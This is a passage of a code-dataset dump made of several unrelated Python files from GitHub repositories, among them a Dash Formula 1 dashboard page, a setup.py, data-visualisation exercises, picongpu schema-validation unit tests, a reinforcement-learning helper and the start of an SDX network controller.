else:\n        main.append(\n            html.Div(className=\"plot comming\", children=html.P(children=r_date))\n        )\n    return main\n\n\ndef Race(year, event, name):\n    race = f1.get_race(year, event)\n    r, date = race.get_load\n    main = []\n    try:\n        exist, predict = strat.strat(name)\n        if exist:\n            main.append(\n                html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_predict', figure=predict)))\n    except:\n        utils.error(f'Something went wrong when trying to display the prediction of {name} {year}')\n    if r:\n        try:\n            main = race_result(main, race.results)\n        except:\n            utils.error(f\"Could not show Race results for {name} {year}\")\n        try:\n            main.append(\n                html.Div(className=\"plot lap_comp\",\n                         children=dcc.Graph(id='race_delta_to_first', figure=race.delta_to_first())))\n        except:\n            utils.error(f\"Race delta to first from {name} {year} could not be displayed\")\n        main.append(\n            html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_lap_times', figure=race.lap_times())))\n        main.append(\n            html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_pos_evo', figure=race.drivers_evo())))\n        main.append(\n            html.Div(className=\"plot violin_st\", children=dcc.Graph(id='race_violin_st', figure=race.violin_st())))\n        main.append(\n            html.Div(className=\"plot violin_lap\", children=dcc.Graph(id='race_violin_lap', figure=race.violin_lap())))\n        main.append(\n            html.Div(className=\"plot top_speed\", children=dcc.Graph(id='race_top_speed', figure=race.top_speed())))\n    else:\n        main.append(\n            html.Div(className=\"plot comming\", children=html.P(children=date))\n        )\n    return main\n\n\ndef content(year, event, session, we):\n    if session == \"fp\":\n        main = fp(year, event)\n    elif session == \"qualif\":\n        main = Qualy(year, event, we.Name.iloc[0])\n    elif session == \"race\":\n        main = Race(year, event, we.Name.iloc[0])\n    elif session == \"sprint\":\n        main = Sprint(year, event, we.Format.iloc[0], we.Name.iloc[0])\n    else:\n        main = \"overall\"\n    return html.Div(className=\"main\", children=main)\n\n\ndef overview(year, event, gp):\n    with open(path.join(\"data\", 'races_desc.json'), 'r') as f:\n        races_info = json.load(f)\n    race = races_info[gp.Name.iloc[0]]\n    content = []\n    content.append(\n        html.Div(className=\"we_title\", children=html.H1(children=f\"Round {gp.Round.iloc[0]} : {gp.Name.iloc[0]}\")))\n\n    try:\n        results = f1.get_race(year, event).results\n        content = race_result(content, results)\n    except:\n        results = 0\n\n    track_stats = [\n        html.Div(className=\"track_name\", children=race['name']),\n        html.Div(className=\"infos\", children=[\n            html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"First Grand Prix\"),\n                                                 html.P(className=\"stat\", children=race['first_gp'])]),\n            html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"Number of Laps\"),\n                                                 html.P(className=\"stat\", children=race['nb_laps'])]),\n            html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"Circuit Length\"),\n                                                 html.P(className=\"stat\", children=race['length'])]),\n            html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"Race Distance\"),\n                                                 html.P(className=\"stat\", children=race['race_distance'])]),\n            html.Div(className=\"info full\", children=[html.P(className=\"Label\", children=\"Lap Record\"),\n                                                      html.P(className=\"stat\", children=[race['lap_record']['time'],\n                                                                                         html.Small(children=\n                                                                                                    race['lap_record'][\n                                                                                                        'owner'])])]\n                     ),\n        ])\n    ]\n    content.append(html.Div(className=\"flex\", children=[html.Div(className=\"box stats\", children=track_stats),\n                                                        
html.Img(className=\"box circuit\", src=f\"/{race['image']}\")]))\n\n    content.append(html.Div(className=\"box built\", children=[html.H1(children=\"When was the track built?\"),\n                                                              html.P(children=race[\"built\"].replace('\\u00e2\\u0080\\u0099',\n                                                                                                     '’'))]))\n    content.append(html.Div(className=\"box story\", children=[html.H1(children=\"When was its first Grand Prix?\"),\n                                                              html.P(children=race[\"first_gp-story\"].replace(\n                                                                  '\\u00e2\\u0080\\u0099', '’'))]))\n    content.append(html.Div(className=\"box like\", children=[html.H1(children=\"What’s the circuit like?\"),\n                                                            html.P(children=race[\"like\"].replace('\\u00e2\\u0080\\u0099',\n                                                                                                 '’'))]))\n    content.append(html.Div(className=\"box why\", children=[html.H1(children=\"Why go?\"),\n                                                           html.P(children=race[\"why\"].replace('\\u00e2\\u0080\\u0099',\n                                                                                               '’'))]))\n    content.append(html.Div(className=\"box where\", children=[html.H1(children=\"Where is the best place to watch?\"),\n                                                             html.P(children=race[\"where\"].replace('\\u00e2\\u0080\\u0099',\n                                                                                                   '’'))]))\n    content.append(html.Div(className=\"box cprights\", children=html.P(children=\"Source : formula1.com\")))\n\n    return html.Div(className=\"main overview\", children=content)\n\n\ndef layout(session=None, year=None, event=None, **other):\n    gp_data = get_dataframe()\n    if year is None or event is None:\n        # Map creation\n        filtered_data = gp_data[gp_data['Year'] == gp_data['Year'].max()]\n        map_fig = make_map(filtered_data)\n\n        # Dropdown creation\n        year_options = [{'label': str(year), 'value': year} for year in gp_data['Year'].unique()]\n        year_dropdown = dcc.Dropdown(\n            id='year-dropdown',\n            options=year_options,\n            value=gp_data['Year'].max()\n        )\n        return html.Div(className=\"content-map\", children=[\n            html.Div(className=\"year\", children=[\n                html.Label(\"Choose the year : \"),\n                year_dropdown\n            ]),\n            dcc.Graph(id='map-graph', figure=map_fig,\n                      config=dict(displayModeBar=False, scrollZoom=False,\n                                  showAxisDragHandles=False, showAxisRangeEntryBoxes=False)),\n            dcc.Location(id='url', refresh=True)\n        ])\n\n    year = int(year)\n    event = int(event)\n    chosen_gp = gp_data.loc[(gp_data['Year'] == year) & (gp_data[\"Round\"] == event)]\n    # Define the page if all variables are set\n    if session == \"fp\" or session == \"qualif\" or session == \"race\" or session == \"sprint\":\n        # page = content(year, event, session, chosen_gp)\n        try:\n            page = content(year, event, session, chosen_gp)\n        except:\n            # TODO : Make it better\n            page = html.P(children=\"Sorry there is a problem here\")\n            utils.error(f'Something went wrong when trying to display {session} of {chosen_gp.Name.iloc[0]} {year}')\n    else:\n        page = overview(year, event, chosen_gp)\n    if chosen_gp.Format.iloc[0] == \"sprint_shootout\" or chosen_gp.Format.iloc[0] == \"sprint\":\n        is_sprint = True\n    else:\n        is_sprint = False\n    if chosen_gp.index == gp_data.index.min():\n        first = [True]\n    else:\n        first = [False,\n                 f\"{gp_data.loc[chosen_gp.index - 1, 'Year'].iloc[0]}/{gp_data.loc[chosen_gp.index - 1, 'Round'].iloc[0]}\"]\n    if chosen_gp.index == gp_data.index.max():\n        last = [True]\n    else:\n        last = [False,\n                f\"{gp_data.loc[chosen_gp.index + 1, 'Year'].iloc[0]}/{gp_data.loc[chosen_gp.index + 1, 'Round'].iloc[0]}\"]\n    head = header(str(year), str(event), session, is_sprint, first, last)\n    return html.Div(className=\"content\", children=[head, page])\n\n\n# Callback to update the map\n@dash.callback(\n    dash.dependencies.Output('map-graph', 'figure'),\n    [dash.dependencies.Input('year-dropdown', 'value')]\n)\ndef update_map(year):\n    gp_data = get_dataframe()\n    
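# the schedule is re-read on every callback so the past/future colouring stays current\n    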
filtered_data = gp_data[gp_data['Year'] == year]\n    map_fig = make_map(filtered_data)\n    return map_fig\n\n\n# Callback for the URL redirection\n@dash.callback(\n    dash.dependencies.Output('url', 'pathname'),\n    [dash.dependencies.Input('map-graph', 'clickData')])\ndef update_url(clickData):\n    if clickData is not None:\n        # Get the year and round of the clicked race\n        year = clickData['points'][0]['customdata'][0]\n        round = clickData['points'][0]['customdata'][1]\n        # Update the URL with the selected race\n        return f'/grand-prix/{year}/{round}/overview/'\n\n\n@dash.callback(\n    [dash.dependencies.Output(\"race-results\", \"className\"), dash.dependencies.Output(\"more-race\", \"src\")],\n    dash.dependencies.Input(\"more-race\", \"n_clicks\"),\n    [dash.dependencies.State(\"race-results\", \"className\"), dash.dependencies.State(\"more-race\", \"src\")],\n)\ndef toggle_race_results(n_clicks, current_class, current_src):\n    if n_clicks is None:\n        return current_class, current_src\n    if n_clicks % 2 == 1:\n        return \"display-all\", \"/assets/images/less.svg\"\n    else:\n        return \"\", \"/assets/images/more.svg\"\n","repo_name":"RobinGuerard21/AlpineFanApp","sub_path":"pages/grand-prix.py","file_name":"grand-prix.py","file_ext":"py","file_size_in_byte":27474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"5025176636","text":"#!/usr/bin/env python3\n\nimport codecs\nimport os.path\n\nfrom setuptools import find_packages, setup\n\nINSTALL_REQUIRES = [\n    \"numpy >= 1.11\",\n    \"scipy\",\n    \"xarray\",\n    \"matplotlib\",\n]\nTESTS_REQUIRE = [\"pytest >= 2.7.1\", \"nitime\"]\n\n\ndef read(rel_path):\n    here = os.path.abspath(os.path.dirname(__file__))\n    with codecs.open(os.path.join(here, rel_path), \"r\") as fp:\n        return fp.read()\n\n\ndef get_version(rel_path):\n    for line in read(rel_path).splitlines():\n        if line.startswith(\"__version__\"):\n            delim = '\"' if '\"' in line else \"'\"\n            return line.split(delim)[1]\n    else:\n        raise RuntimeError(\"Unable to find version string.\")\n\n\nsetup(\n    name=\"spectral_connectivity\",\n    version=get_version(\"spectral_connectivity/__init__.py\"),\n    license=\"GPL-3.0\",\n    description=(\n        \"Frequency domain functional and directed \"\n        \"connectivity analysis tools for electrophysiological \"\n        \"data\"\n    ),\n    author=\"Eric Denovellis\",\n    author_email=\"eric.denovellis@ucsf.edu\",\n    url=\"https://github.com/Eden-Kramer-Lab/spectral_connectivity\",\n    # long_description=open(\"README.md\").read(),\n    long_description_content_type=\"text/x-rst\",\n    classifiers=[\n        \"Intended Audience :: Science/Research\",\n        \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n        \"Programming Language :: Python\",\n        \"Topic :: Scientific/Engineering\",\n        \"Operating System :: Microsoft :: Windows\",\n        \"Operating System :: POSIX\",\n        \"Operating System :: Unix\",\n        \"Operating System :: MacOS\",\n        \"Programming Language :: Python :: 3\",\n    ],\n    platforms=\"any\",\n    keywords=(\n        \"python neuroscience electrophysiology \"\n        \"multitaper spectrogram frequency-domain\"\n    ),\n    python_requires=\">=3\",\n    packages=find_packages(),\n    install_requires=INSTALL_REQUIRES,\n    tests_require=TESTS_REQUIRE,\n    project_urls={\n        \"Documentation\": \"https://spectral-connectivity.readthedocs.io/en/latest/\",\n        \"Bug Reports\": \"https://github.com/Eden-Kramer-Lab/spectral_connectivity/issues\",\n        \"Source\": \"https://github.com/Eden-Kramer-Lab/spectral_connectivity\",\n    
},\n)\n","repo_name":"Eden-Kramer-Lab/spectral_connectivity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"47"} +{"seq_id":"12947780844","text":"vitInter,vitGremio,empates,grenais,a=0,0,0,0,1\nwhile (a==1):\n inter,gremio = input().split()\n grenais += 1\n if a==1:\n if inter >gremio:\n vitInter +=1\n elif inter vitInter:\n print(\"Gremio venceu mais\")\nelif vitGremio == vitInter:\n print(\"Não houve vencedor\")\nelse:\n print(\"Inter venceu mais\")","repo_name":"MatheusA199/beecrowd-puzzle-python","sub_path":"1131-Python.py","file_name":"1131-Python.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1553511126","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 6 12:54:56 2020\n\n@author: haythamomar\n\"\"\"\n\n\n# #- make a new script and call it the section 8 assignment.\n\n# #Please try to answer the questions first and then have a look at the solved script.\n\n\n\n\n\n\n# #2- import twentyeleven.csv ,iris, cars and the requested packages.\n\nimport pandas as pd\nimport seaborn as sns\nimport os \npath = os.getcwd()\nprint(path)\ntwenty= pd.read_csv('{0}/twentyeleven.csv'.format(path))\ncars= pd.read_csv('{0}/cars.csv'.format(path))\niris=pd.read_csv('{0}/iris.csv'.format(path))\n\ntwenty.info()\ntwenty['InvoiceDate']=pd.to_datetime(twenty['InvoiceDate'])\ntwenty['date']= twenty['InvoiceDate'].dt.strftime('%Y-%m-%d')\ntwenty['date']= pd.to_datetime(twenty['date'])\n\n\n\n# 3- Make a line plot of the sales of 2011 for the united kingdom.\n\nuk= twenty[twenty.Country == 'United Kingdom']\n\n\nsales_per_day= uk.groupby('date').agg(total_sales=('Quantity','sum'))\n\nsales_per_day.plot()\n\n\n\n\n# 4- for the next plot; select country countries<-c(\"Canada\",\"Denmark\",\"EIRE\",\"United Kingdom\")\n# make a line plot per each country using plt subplots\n\ncountries=[\"Canada\",\"Denmark\",\"EIRE\",\"United Kingdom\"]\nfour_countries= twenty[twenty.Country.isin(countries)]\n\nsales_per_Day= four_countries.groupby(['Country','date']).agg(total_sales=('Quantity','sum')).reset_index()\n\nsales_pivoted= pd.pivot_table(sales_per_Day,values= 'total_sales',\n columns='Country',index='date',fill_value=0)\n\nsales_pivoted.plot(subplots=True)\n\n\n\n\n\n# 5- Make a scatter plot for cars between price and horsepower.\n\nsns.scatterplot(x= 'Price',y='horsepower',data=cars)\n\n\n\n# 6- Make a distribution plot of sepal length in iris and segregate it by flower.\n\nsetosa= iris[iris.species=='setosa']\nvirginica= iris[iris.species== 'virginica']\nversicolor=iris[iris.species== 'versicolor']\n\nfig=sns.kdeplot(setosa.sepal_length,label='setosa')\nfig=sns.kdeplot(virginica.sepal_length,label='virginica')\nfig=sns.kdeplot(versicolor.sepal_length,label='versicolor')\n\n\n\n# 7- Make a boxplot for the number of cylinders of cars, make sure to take only 4,6 \n#and eight cylinders.\n\ncommon_cylenders= cars[cars.cylenders.isin([4,6,8])]\n\nsns.boxplot(x='cylenders',y='horsepower',data=common_cylenders)\n\n\n\n# 8- make a pairplot of iris dataset segregated by flower type.\n\nsns.pairplot(iris,hue='species')\n\n\n\n\n\n\n","repo_name":"Khixinhxan/datascience_supplychain_practice","sub_path":"Jupyternotebook_source/Section_8_visualization_with_matplotlib_and_seaborn/section_8_assignment (1).py","file_name":"section_8_assignment 
 (1).py","file_name":"section_8_assignment (1).py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"2469504624","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom hydra import compose, initialize\n\nfrom dataset import make_circles_triple\n\n\ndef plot_cloud(cfg):\n    \"\"\"Plot the triple-circles point clouds and save the figure.\"\"\"\n    mean, labels = make_circles_triple(\n        cfg.training.n_train,\n        noise=cfg.dataset.circles_noise,\n        random_state=42,\n        factors=cfg.dataset.factors,\n    )\n    fig = plt.figure(figsize=(25, 4))\n    axes = [None, None, None, None, None]\n    axes[0] = fig.add_subplot(1, 5, 1)\n    for lab in [2, 1, 0]:\n        idx = np.where(labels == lab)[0]\n        axes[0].scatter(mean[idx, 0], mean[idx, 1], s=1)\n\n    rng = np.random.default_rng(seed=0)\n    point_list = [\n        mean[i]\n        + np.sqrt(cfg.dataset.gauss_cov)\n        * rng.standard_normal(size=(cfg.training.n_points, 2))\n        for i in range(cfg.training.n_train)\n    ]\n    points = np.concatenate(point_list, axis=0)\n    labels = np.repeat(labels, cfg.training.n_points)\n    color_list = [\"C2\", \"C1\", \"C0\"]\n    for i in range(3):\n        axes[i + 1] = fig.add_subplot(1, 5, i + 2)\n        idx = np.where(labels == i)[0]\n        axes[i + 1].scatter(points[idx, 0], points[idx, 1], s=1, color=color_list[i])\n        axes[i + 1].set_xlim(-2.2, 2.2)\n        axes[i + 1].set_ylim(-2.2, 2.2)\n    axes[4] = fig.add_subplot(1, 5, 5)\n    for lab in [2, 1, 0]:\n        idx = np.where(labels == lab)[0]\n        axes[4].scatter(points[idx, 0], points[idx, 1], s=1)\n    fig.tight_layout()\n    image_dir = os.path.join(cfg.directory.root_dir, cfg.directory.image_dir)\n    os.makedirs(image_dir, exist_ok=True)\n    plt.savefig(os.path.join(image_dir, cfg.inference.dataset_fig_file))\n    plt.show()\n\n\nif __name__ == \"__main__\":\n    with initialize(version_base=None, config_path=\".\"):\n        config = compose(config_name=\"config\")\n    plot_cloud(config)\n","repo_name":"tam17aki/deep_divergence_practice","sub_path":"clustering/gaussian/plot_dataset.py","file_name":"plot_dataset.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"11977503307","text":"from picongpu.pypicongpu.rendering import RenderedObject\n\nimport unittest\nimport typeguard\nfrom picongpu.pypicongpu.solver import YeeSolver\nfrom picongpu.pypicongpu import Simulation\nimport jsonschema\n\n\nclass TestRenderedObject(unittest.TestCase):\n    def schema_store_init(self):\n        RenderedObject._schemas_loaded = False\n        RenderedObject._maybe_fill_schema_store()\n\n    def schema_store_reset(self):\n        RenderedObject._schemas_loaded = False\n        RenderedObject._schema_by_uri = {}\n\n    def setUp(self):\n        self.schema_store_reset()\n        # if required test case can additionally init the schema store\n\n    def test_basic(self):\n        \"\"\"simple test using a real-world example\"\"\"\n        yee = YeeSolver()\n        self.assertTrue(isinstance(yee, RenderedObject))\n        self.assertNotEqual(\n            {}, RenderedObject._get_schema_from_class(type(yee)))\n        # no throw -> schema found\n        self.assertEqual(yee.get_rendering_context(),\n                         yee._get_serialized())\n\n        # manually check that schema has been loaded\n        fqn = RenderedObject._get_fully_qualified_class_name(type(yee))\n        uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n        self.assertTrue(uri in RenderedObject._schema_by_uri)\n\n    def test_not_implemented(self):\n        \"\"\"raises if _get_serialized() is not implemented\"\"\"\n        class EmptyClass(RenderedObject):\n            pass\n\n        with self.assertRaises(NotImplementedError):\n            e = EmptyClass()\n            
e.get_rendering_context()\n\n def test_no_schema(self):\n \"\"\"not finding a schema raises\"\"\"\n class HasNoSchema(RenderedObject):\n def _get_serialized(self):\n return {\"any\": \"thing\"}\n\n with self.assertRaisesRegex(RuntimeError, \".*[Ss]chema.*\"):\n h = HasNoSchema()\n h.get_rendering_context()\n\n def test_schema_validation_and_passthru(self):\n \"\"\"schema is properly validated (and passed through)\"\"\"\n self.schema_store_init()\n\n class MaybeValid(RenderedObject):\n be_valid = False\n\n def _get_serialized(self):\n if self.be_valid:\n return {\"my_string\": \"ja\", \"num\": 17}\n return {\"my_string\": \"\"}\n\n fqn = RenderedObject._get_fully_qualified_class_name(MaybeValid)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n RenderedObject._schema_by_uri[uri] = {\n \"properties\": {\n \"my_string\": {\"type\": \"string\"},\n \"num\": {\"type\": \"number\"},\n },\n \"required\": [\"my_string\", \"num\"],\n \"unevaluatedProperties\": False,\n }\n\n # all okay\n maybe_valid = MaybeValid()\n maybe_valid.be_valid = True\n self.assertNotEqual({}, maybe_valid.get_rendering_context())\n\n maybe_valid.be_valid = False\n with self.assertRaisesRegex(Exception, \".*[Ss]chema.*\"):\n maybe_valid.get_rendering_context()\n\n def test_invalid_schema(self):\n \"\"\"schema itself is broken -> creates error\"\"\"\n self.schema_store_init()\n\n class HasInvalidSchema(RenderedObject):\n def _get_serialized(self):\n return {\"any\": \"thing\"}\n\n fqn = RenderedObject._get_fully_qualified_class_name(HasInvalidSchema)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n # note: this is very evil injection, do not *ever* do this\n RenderedObject._schema_by_uri[uri] = {\n \"type\": \"invalid_type_HJJE$L!BGCDHS\",\n }\n\n h = HasInvalidSchema()\n with self.assertRaisesRegex(Exception, \".*[Ss]chema.*\"):\n h.get_rendering_context()\n\n def test_schema_should_forbid_unevaluated_properties(self):\n \"\"\"warn if schema allows unevaluated properties\"\"\"\n self.schema_store_init()\n\n class HasPermissiveSchema(RenderedObject):\n def _get_serialized(self):\n return {\"any\": \"thing\"}\n fqn = RenderedObject._get_fully_qualified_class_name(\n HasPermissiveSchema)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n\n # schema \"{}\" is considered too permissive\n RenderedObject._schema_by_uri[uri] = {}\n\n permissive = HasPermissiveSchema()\n with self.assertLogs(level=\"WARNING\") as caught_logs:\n # valid, but warns\n self.assertNotEqual({}, permissive.get_rendering_context())\n self.assertEqual(1, len(caught_logs.output))\n\n def test_fully_qualified_classname(self):\n \"\"\"fully qualified classname is correctly generated\"\"\"\n # concept: define two classes of same name\n # FQN (fully qualified name) must contain their names\n # but both FQNs must be not equal\n\n def obj1():\n class MyClass:\n pass\n return MyClass\n\n def obj2():\n class MyClass:\n pass\n return MyClass\n\n t1 = obj1()\n t2 = obj2()\n # both are not equal\n self.assertNotEqual(t1, t2)\n # ... but type equality still works (sanity check)\n self.assertNotEqual(t1, obj1())\n\n fqn1 = RenderedObject._get_fully_qualified_class_name(t1)\n fqn2 = RenderedObject._get_fully_qualified_class_name(t2)\n\n # -> \"MyClass\" is contained in FQN\n self.assertTrue(\"MyClass\" in fqn1)\n self.assertTrue(\"MyClass\" in fqn2)\n # ... 
but they are not the same\n self.assertNotEqual(fqn1, fqn2)\n\n def test_schema_optional(self):\n \"\"\"schema may define optional parameters\"\"\"\n self.schema_store_init()\n\n class MayReturnNone(RenderedObject):\n toreturn = None\n\n def _get_serialized(self):\n return {\"value\": self.toreturn}\n\n fqn = RenderedObject._get_fully_qualified_class_name(MayReturnNone)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n RenderedObject._schema_by_uri[uri] = {\n \"type\": \"object\",\n \"properties\": {\n \"value\": {\n \"anyOf\": [\n {\n \"type\": \"null\",\n },\n {\n \"type\": \"object\",\n \"properties\": {\n \"mandatory\": {\n \"type\": \"number\",\n \"exclusiveMinimum\": 0,\n },\n },\n \"required\": [\"mandatory\"],\n \"unevaluatedProperties\": False,\n },\n ],\n },\n },\n \"required\": [\"value\"],\n \"unevaluatedProperties\": False,\n }\n\n # ok:\n mrn = MayReturnNone()\n mrn.toreturn = None\n self.assertEqual({\"value\": None}, mrn.get_rendering_context())\n mrn.toreturn = {\"mandatory\": 2}\n self.assertEqual({\"value\": {\"mandatory\": 2}},\n mrn.get_rendering_context())\n\n for invalid in [{\"mandatory\": 0}, {}, \"\", []]:\n with self.assertRaises(Exception):\n mrn = MayReturnNone()\n mrn.toreturn = invalid\n mrn.get_rendering_context()\n\n def test_check_context(self):\n \"\"\"context check can be used manually\"\"\"\n yee = YeeSolver()\n context_correct = yee.get_rendering_context()\n context_incorrect = {}\n\n # must load schemas if required -> reset schema store\n self.schema_store_reset()\n self.assertTrue(not RenderedObject._schemas_loaded)\n\n # (A) context is correctly checked against the given type\n # passes:\n RenderedObject.check_context_for_type(YeeSolver, context_correct)\n\n # implicitly filled schema store\n self.assertTrue(RenderedObject._schemas_loaded)\n\n # same context is not valid for simulation object\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n RenderedObject.check_context_for_type(Simulation, context_correct)\n\n # incorrect context not accepted for YeeSolver\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n RenderedObject.check_context_for_type(YeeSolver, context_incorrect)\n\n # (B) invalid requests are rejected\n # wrong argument types\n with self.assertRaises(typeguard.TypeCheckError):\n RenderedObject.check_context_for_type(\"YeeSolver\", context_correct)\n with self.assertRaises(typeguard.TypeCheckError):\n RenderedObject.check_context_for_type(YeeSolver, \"{}\")\n\n # types without schema\n class HasNoValidation:\n # note: don't use \"Schema\" to not accidentally trigger the regex\n # for the error message below\n # note: does not have to inherit from RenderedObject\n pass\n\n with self.assertRaisesRegex(RuntimeError, \".*[Ss]chema.*\"):\n RenderedObject.check_context_for_type(HasNoValidation, {})\n\n def test_irregular_schema(self):\n \"\"\"non-object (but valid) schemas are accepted\"\"\"\n self.schema_store_init()\n\n class SimpleObject(RenderedObject):\n def _get_serialized(self):\n return {}\n\n fqn = RenderedObject._get_fully_qualified_class_name(SimpleObject)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n # the schema \"false\" is a valid schema; it rejects all inputs\n RenderedObject._schema_by_uri[uri] = False\n\n # there must be an error during validation & a warning issued\n with self.assertLogs(level=\"WARNING\") as caught_logs_rejected:\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n SimpleObject().get_rendering_context()\n 
self.assertEqual(1, len(caught_logs_rejected.output))\n\n # reverse: now must be accepted -- but warning still issued!\n RenderedObject._schema_by_uri[uri] = True\n with self.assertLogs(level=\"WARNING\") as caught_logs_accepted:\n SimpleObject().get_rendering_context()\n self.assertEqual(1, len(caught_logs_accepted.output))\n","repo_name":"ComputationalRadiationPhysics/picongpu","sub_path":"test/python/picongpu/quick/pypicongpu/rendering/renderedobject.py","file_name":"renderedobject.py","file_ext":"py","file_size_in_byte":10377,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"47"} +{"seq_id":"39365770587","text":"import numpy as np\nimport tensorflow as tf\nimport datetime\nimport json\n\n# Different profiles combining resolutions and bitrate\nPROFILES = {1: {1080: 50}, 2: {1080: 30}, 3: {1080: 20}, 4: {1080: 15}, 5: {1080: 10}, 6: {1080: 5}, 7: {720: 25},\n 8: {720: 15}, 9: {720: 10}, 10: {720: 7.5}, 11: {720: 5}, 12: {720: 2.5}}\n\nRANDOM_SEED = 42\nGAMMA = 0.99\n\n\nclass Environment:\n def __init__(self):\n\n np.random.seed(RANDOM_SEED)\n\n\ndef model_summary():\n td_loss = tf.Variable(0.)\n tf.summary.scalar(\"TD_Loss\", td_loss)\n total_reward = tf.Variable(0.)\n tf.summary.scalar(\"Total_Reward\", total_reward)\n avg_entropy = tf.Variable(0.)\n tf.summary.scalar(\"Average_Entropy\", avg_entropy)\n\n model_vars = [td_loss, total_reward, avg_entropy]\n model_ops = tf.summary.merge_all()\n\n return model_vars, model_ops\n\n\ndef compute_gradients(states_matrix, actions_matrix, rewards_matrix, actor_net, critic_net):\n assert states_matrix.shape[0] == actions_matrix.shape[0]\n assert states_matrix.shape[0] == rewards_matrix.shape[0]\n\n ba_size = states_matrix.shape[0]\n\n v_matrix = critic_net.predict(states_matrix)\n\n r_matrix = np.zeros(rewards_matrix.shape)\n\n # if terminal:\n # r_matrix[-1, 0] = 0 # terminal state\n # else:\n # r_matrix[-1, 0] = v_matrix[-1, 0] # boot strap from last state\n\n for t in reversed(range(ba_size - 1)):\n r_matrix[t, 0] = rewards_matrix[t] + GAMMA * r_matrix[t + 1, 0]\n\n td_matrix = r_matrix - v_matrix\n\n actor_gradients = actor_net.get_gradients(states_matrix, actions_matrix, td_matrix)\n critic_gradients = critic_net.get_gradients(states_matrix, r_matrix)\n\n return actor_gradients, critic_gradients, td_matrix\n\n\ndef compute_entropy(info):\n entropy = 0.0\n for i in range(len(info)):\n if 0 < info[i] < 1:\n entropy -= info[i] * np.log(info[i])\n return entropy\n\n\ndef consume_kafka(consumer):\n\n for message in consumer:\n content = message.value\n\n resolution = content['value']['resolution']\n frame_rate = content['value']['frame_rate']\n bitrate = content['value']['bitrate']\n duration = content['value']['duration']\n mos = content['value']['mos']\n timestamp = content['timestamp']\n break\n\n return resolution, frame_rate, bitrate, duration, mos, timestamp\n","repo_name":"Kaiser-14/DRL_QoE_A2C","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42561829527","text":"#!/usr/bin/env python\n# Author:\n# Rudiger Birkner (Networked Systems Group ETH Zurich)\n\nimport os\nimport argparse\n\nimport logging\nfrom threading import Thread\nfrom config import Config\nfrom lib import XCTRLEvent\n\nfrom multiprocessing import Queue\nfrom Queue import Empty\n\nfrom arp_proxy.arp_proxy import ARPProxy\nfrom route_server.route_server import 
RouteServer\nfrom vmac_encoder.supersets import SuperSetEncoder\nfrom loop_detection.loop_detector import LoopDetector\nfrom policies.policies import PolicyHandler\n\n\nclass XCTRL(object):\n def __init__(self,\n sdx_id,\n base_path,\n config_file,\n debug,\n test,\n no_superset,\n rib_timing,\n policy_timing,\n notification_timing,\n no_notifications):\n\n self.logger = logging.getLogger(\"XCTRL\")\n self.debug = debug\n self.test = test\n self.no_notifications = no_notifications\n self.no_superset = no_superset\n\n self.rib_timing = rib_timing\n self.policy_timing = policy_timing\n self.notification_timing = notification_timing\n if self.debug:\n self.logger.setLevel(logging.DEBUG)\n self.logger.info('init')\n\n # Parse Config\n self.config = Config(sdx_id, base_path, config_file)\n\n # Event Queue\n self.event_queue = Queue()\n\n self.run = False\n\n if self.test:\n self.thread_modules = [\"route_server\", \"loop_detection\", \"policy_handler\"]\n else:\n self.thread_modules = [\"route_server\", \"loop_detection\", \"policy_handler\", \"arp_proxy\"]\n\n self.modules = dict()\n self.threads = dict()\n\n def start(self):\n # Start all modules\n # route server\n self.modules[\"route_server\"] = RouteServer(self.config, self.event_queue, self.debug, self.test)\n\n # loop detection - needs access to RIB\n self.modules[\"loop_detection\"] = LoopDetector(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"route_server\"].rib,\n None,\n self.test,\n self.no_notifications,\n self.rib_timing,\n self.notification_timing)\n\n # VMAC encoder - needs access to RIB, CIB\n self.modules[\"vmac_encoder\"] = SuperSetEncoder(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"route_server\"].rib,\n self.modules[\"loop_detection\"].forbidden_paths,\n self.test)\n\n # policies - needs access to Correctness, VMAC encoder\n self.modules[\"policy_handler\"] = PolicyHandler(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"vmac_encoder\"],\n self.modules[\"loop_detection\"],\n self.test,\n self.policy_timing)\n\n self.modules[\"loop_detection\"].policy_handler = self.modules[\"policy_handler\"]\n\n # arp proxy - needs access to VMAC encoder\n self.modules[\"arp_proxy\"] = ARPProxy(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"vmac_encoder\"],\n self.test)\n\n for name in 